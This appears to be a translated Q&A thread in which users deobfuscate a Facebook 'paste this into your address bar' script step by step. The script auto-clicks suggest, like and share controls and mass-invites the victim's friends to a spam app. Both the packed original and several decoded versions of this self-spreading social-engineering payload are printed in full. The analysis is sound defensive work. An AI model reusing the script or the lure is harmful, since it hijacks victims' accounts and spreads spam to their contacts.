这不是一个问题,以帮助我自己的编程,但我发现这个页面在Facebook上有一个很酷的错觉和一个页面,上面写着“看到真正的错觉,将这些代码复制并粘贴到你的地址栏”,并且有一个脚本:
免责声明:请勿运行以下代码
javascript:(function(){a='app129556453726651_fsDszN';
b='app129556453726651_rcgAmd';
rhsjGW='app129556453726651_rhsjGW';SqmbQL='app129556453726651_SqmbQL';
kPtsfs='app129556453726651_kPtsfs';
eval(function(p,a,c,k,e,r){e=function(c)
{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e)
{return r[e]}];e=function(){return'\\w+'};c=1};
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p}
('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];
d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);
s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g])
{F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);
',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||kPtsfs|fs|SocialGraphManager|for|in|if|20|SqmbQL|rhsjGW|21|2000|4000|3000'.split('|'),0,{}))})();
这到底是什么意思?如果我把它放在我的地址栏中会发生什么,我认为这是一个非常不明智的想法?
我很困惑。
答案 0 :(得分:85)
一开始不清楚该代码是做什么的(因为它的目的是)所以要回答你的问题,代码必须被解压缩。只是这样你可以按照我的想法,我在这里包括非混淆的每一步。
这是添加了换行符的脚本的当前形式:
(function() {
a='app129556453726651_fsDszN';
b='app129556453726651_rcgAmd';
rhsjGW='app129556453726651_rhsjGW';
SqmbQL='app129556453726651_SqmbQL';
kPtsfs='app129556453726651_kPtsfs';
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||kPtsfs|fs|SocialGraphManager|for|in|if|20|SqmbQL|rhsjGW|21|2000|4000|3000'.split('|'),0,{}))
})();
正如我们所看到的,脚本本身是一个自调用闭包内的函数,它将在处理脚本时立即执行。该脚本包含一些神秘的变量和一些用Edward's packer打包的代码。当我们使用解包器like this解压缩代码时,我们得到以下形式(添加了换行符):
(function(){
a='app129556453726651_fsDszN';
b='app129556453726651_rcgAmd';
rhsjGW='app129556453726651_rhsjGW';
SqmbQL='app129556453726651_SqmbQL';
kPtsfs='app129556453726651_kPtsfs';
var variables = [
"\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
"\x73\x74\x79\x6C\x65",
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
"\x68\x69\x64\x64\x65\x6E",
"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
"\x76\x61\x6C\x75\x65",
"\x73\x75\x67\x67\x65\x73\x74",
"\x6C\x69\x6B\x65\x6D\x65",
"\x73\x6C\x69\x6E\x6B",
"\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73",
"\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74",
"\x63\x6C\x69\x63\x6B",
"\x69\x6E\x69\x74\x45\x76\x65\x6E\x74",
"\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74",
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
"\x69\x6E\x70\x75\x74",
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65",
"\x53\x68\x61\x72\x65",
"\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74"];
d = document;
d[variables[2]](kPtsfs)[variables[1]][variables[0]] = variables[3];
d[variables[2]](a)[variables[4]] = d[variables[2]](b)[variables[5]];
s = d[variables[2]](variables[6]);
m = d[variables[2]](variables[7]);
sl = d[variables[2]](variables[8]);
c = d[variables[10]](variables[9]);
c[variables[12]](variables[11], true, true);
s[variables[13]](c);
setTimeout(function () {
fs[variables[14]]()
}, 5000);
setTimeout(function () {
SocialGraphManager[variables[17]](variables[15], variables[16]);
setTimeout(function () {
c[variables[12]](variables[11], true, true);
sl[variables[13]](c);
setTimeout(function () {
inp = document[variables[19]](variables[18]);
for (i in inp) {
if (inp[i][variables[5]] == variables[20]) {
inp[i][variables[13]](c)
}
};
m[variables[13]](c);
setTimeout(function () {
d[variables[2]](SqmbQL)[variables[4]] = d[variables[2]](rhsjGW)[variables[5]];
}, 2000)
}, 4000)
}, 3000)
}, 5000);
})();
我们可以立即看到代码在特定的时间间隔内执行命令,先是5秒后,然后是3,然后是4,最后是2秒。脚本的开头包含一些十六进制编码的变量,可以解码为:
var variables = [
"visibility",
"style",
"getElementById",
"hidden",
"innerHTML",
"value",
"suggest",
"likeme",
"slink",
"MouseEvents",
"createEvent",
"click",
"initEvent",
"dispatchEvent",
"select_all",
"sgm_invite_form",
"/ajax/social_graph/invite_dialog.php",
"submitDialog",
"input",
"getElementsByTagName",
"Share",
"pop_content"];
通过将这些变量替换为代码,我们得到:
(function(){
a='app129556453726651_fsDszN';
b='app129556453726651_rcgAmd';
rhsjGW='app129556453726651_rhsjGW';
SqmbQL='app129556453726651_SqmbQL';
kPtsfs='app129556453726651_kPtsfs';
d = document;
d["getElementById"](kPtsfs)["style"]["visibility"] = "hidden";
d["getElementById"](a)["innerHTML"] = d["getElementById"](b)["value"];
s = d["getElementById"]("suggest");
m = d["getElementById"]("likeme");
sl = d["getElementById"]("slink");
c = d["createEvent"]("MouseEvents");
c["initEvent"]("click", true, true);
s["dispatchEvent"](c);
setTimeout(function () {
fs["select_all"]()
}, 5000);
setTimeout(function () {
SocialGraphManager["submitDialog"]("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
setTimeout(function () {
c["initEvent"]("click", true, true);
sl["dispatchEvent"](c);
setTimeout(function () {
inp = document["getElementsByTagName"]("input");
for (i in inp) {
if (inp[i]["value"] == "Share") {
inp[i]["dispatchEvent"](c)
}
};
m["dispatchEvent"](c);
setTimeout(function () {
d["getElementById"](SqmbQL)["innerHTML"] = d["getElementById"](rhsjGW)["value"];
}, 2000)
}, 4000)
}, 3000)
}, 5000);
})();
正如我们所知document['getElementById']与document.getElementById相同,我们可以清理代码,使其最终变得可读。我还做了变量替换并将setTimeouts分开以便于阅读:
(function(){
document.getElementById('app129556453726651_kPtsfs').style.visibility = "hidden";
document.getElementById('app129556453726651_fsDszN').innerHTML = document.getElementById('app129556453726651_rcgAmd').value;
s = document.getElementById("suggest");
m = document.getElementById("likeme");
sl = document.getElementById("slink");
c = document.createEvent("MouseEvents");
c.initEvent("click", true, true);
s.dispatchEvent(c);
setTimeout(function () {
fs.select_all()
}, 5000);
setTimeout(function () {
SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
setTimeout(function () {
c.initEvent("click", true, true);
sl.dispatchEvent(c);
}, 8000);
setTimeout(function () {
inp = document.getElementsByTagName("input");
for (i in inp) {
if (inp[i].value == "Share") {
inp[i].dispatchEvent(c);
}
};
m.dispatchEvent(c);
}, 12000);
setTimeout(function () {
document.getElementById('app129556453726651_SqmbQL').innerHTML = document.getElementById('app129556453726651_rhsjGW').value;
}, 14000);
})();
现在,在不了解Facebook如何工作的情况下,这确实看起来很恶意,分享你可能不想分享的东西等。希望有帮助,这篇文章的主要思想是展示你如何自己解密这样的脚本。 :)
答案 1 :(得分:4)
这是一个排序的facebook'病毒'..它实际上邀请所有朋友加入名为socialgraph的应用
参考:http://davezor.posterous.com/reverse-engineering-the-newest-facebook-invit
答案 2 :(得分:3)
这个问题现在每天都出现......
邀请所有朋友加入群组(或类似内容)的代码。然后该组开始向其成员发送垃圾广告。
答案 3 :(得分:2)
恶意代码
document.getElementById('app129556453726651_kPtsfs').style.visibility = 'hidden';
document.getElementById('app129556453726651_fsDszN').innerHTML = document.getElementById('app129556453726651_rcgAmd').value;
var s = document.getElementById('suggest');
var m = document.getElementById('likeme');
var sl = document.getElementById('slink');
var c = document.createEvent("MouseEvents");
c.initEvent('click', true, true);
s.dispatchEvent(c);
setTimeout(function () {
fs.select_all()
SocialGraphManager.submitDialog('sgm_invite_form', '/ajax/social_graph/invite_dialog.php');
setTimeout(function () {
c.initEvent('click', true, true);
sl.dispatchEvent(c);
setTimeout(function () {
var inp = document.getElementsByTagName('input');
for (i in inp) {
if (inp[i].value == 'Share') {
inp[i].dispatchEvent(c)
}
};
m.dispatchEvent(c);
setTimeout(function () {
document.getElementById('app129556453726651_SqmbQL').innerHTML = document.getElementById('app129556453726651_rhsjGW').value;
}, 2000)
}, 4000)
}, 3000)
}, 5000);